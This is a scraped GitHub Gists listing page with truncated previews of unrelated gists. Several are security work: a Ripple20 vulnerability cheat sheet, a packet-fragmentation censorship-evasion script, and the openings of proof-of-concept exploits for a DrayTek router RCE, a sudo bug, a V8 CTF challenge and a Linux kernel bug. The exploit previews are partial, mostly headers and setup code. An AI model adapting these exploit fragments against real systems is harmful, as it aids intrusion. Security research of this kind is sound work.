
@Theldus
Theldus / README.md
Last active June 5, 2024 12:18
The only proper way to debug 16-bit (x86) code on Qemu+GDB

The only proper way to debug 16-bit code on Qemu+GDB

(or nearly so...)

GDB is undeniably an extremely versatile debugger, with the ability to add breakpoints, watchpoints, dump memory, registers, and the source code (along with its corresponding assembly). These features make it the perfect Swiss Army knife for most programmers. In addition to that, the possibility of implementing a 'GDB Stub' and automatically supporting GDB in your application makes it an almost universal debugger for a variety of tasks.

Qemu, like other virtual machines (such as 86Box), also implements debugging via GDB Stub, which enormously facilitates the development of bootloaders, operating systems, and more. The support for 32-bit and 64-bit code is quite good, and I have never seen any complaints about it. However, for 16-bit/real mode...

Is debugging in 16-bit/real mode really that bad?

If you have ever tried to debug 16-bit code on Qemu, you know how painful it can be:

  1. GDB thinks your code is
@infernalheaven
infernalheaven / overlapped_ip_fragmentation.py
Created March 25, 2022 16:40 — forked from fqrouter/overlapped_ip_fragmentation.py
The code to send IP fragments was copied from scapy; verified by tcpdump that it indeed sends two packets instead of one. However, GFW can still decode the content despite our using overlapped IP fragmentation. But 8.8.8.8 dropped the fragmented IP packet, for security reasons.
from netfilterqueue import NetfilterQueue
import traceback
import subprocess
import signal
import dpkt
import socket
raw_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3))
raw_socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2**30)
@EvanMcBroom
EvanMcBroom / arnold.md
Last active July 17, 2024 18:53
IllBeBack - An Undocumented Function

IllBeBack - An Undocumented Function

Microsoft purchased the software Softricity SoftGrid in 2006 and renamed it to Microsoft Application Virtualization, or App-V for short. Windows shipped with several libraries in System32 and SysWOW64 to support App-V.

AppVTerminator.dll

One App-V library stands out from all the rest because it only has one exported function named IllBeBack... That's right! A library signed by Microsoft, with Terminator in the name, that only has a single callable function named IllBeBack.
@SwitHak
SwitHak / 20200618-TLP-WHITE_Ripple20.md
Last active April 26, 2023 22:04
BlueTeam CheatSheet * Ripple20 * | Last updated: 2020-06-26 2121 UTC

Ripple20, set of vulnerabilities inside Treck / KASAGO IP Stacks

General

  • Ripple20 is the codename for a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
  • These vulnerabilities are inside an IP stack sold under two different names (Treck TCP/IP for the U.S. market, Kasago TCP/IP for the Asian market). These two stacks were bought and used under private label by several software companies; some known names are GHnetv2, Kwiknet, Quadnet.
  • But there's more: these stacks were also integrated, sometimes with modifications, inside several RTOS (real-time operating systems).
  • Last, some of the vulnerabilities, depending on the device's operating system, configuration or location, can have a greater or lower CVSS score.
  • My advice is for companies to ask their suppliers if they use one of these stacks and assess the risk following their company risk policy.
  • This will not be an easy set of vulnerabilities to patch, sadly.
@0xsha
0xsha / CVE-2020-8515.go
Last active March 30, 2024 20:52
CVE-2020-8515: DrayTek pre-auth remote root RCE
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
<?php
//php gd-gif.php image.gif gd-image.gif
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
imagedestroy($gif);
?>
@wbowling
wbowling / CVE-2019-18634.py
Last active September 8, 2020 23:03
POC for CVE-2019-18634
#!/usr/bin/python
import os
import pty
from pwn import process, sleep, write, read, listen, p64
"""
From https://github.com/sudo-project/sudo/blob/SUDO_1_8_30/src/tgetpass.c#L401:
} else if (c == sudo_term_kill) {
@wbowling
wbowling / pwn.js
Last active April 20, 2021 21:42
starCTF (*CTF) 2019 oob-v8
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;
var arr1 = [1.1];
var arr2 = [Date];
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();
@wbowling
wbowling / cve-2018-5333-poc.c
Created March 9, 2019 01:26
Example of using CVE-2019-9213 to make previous kernel bugs exploitable
// 4.4.0-116-generic #140-Ubuntu SMP
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>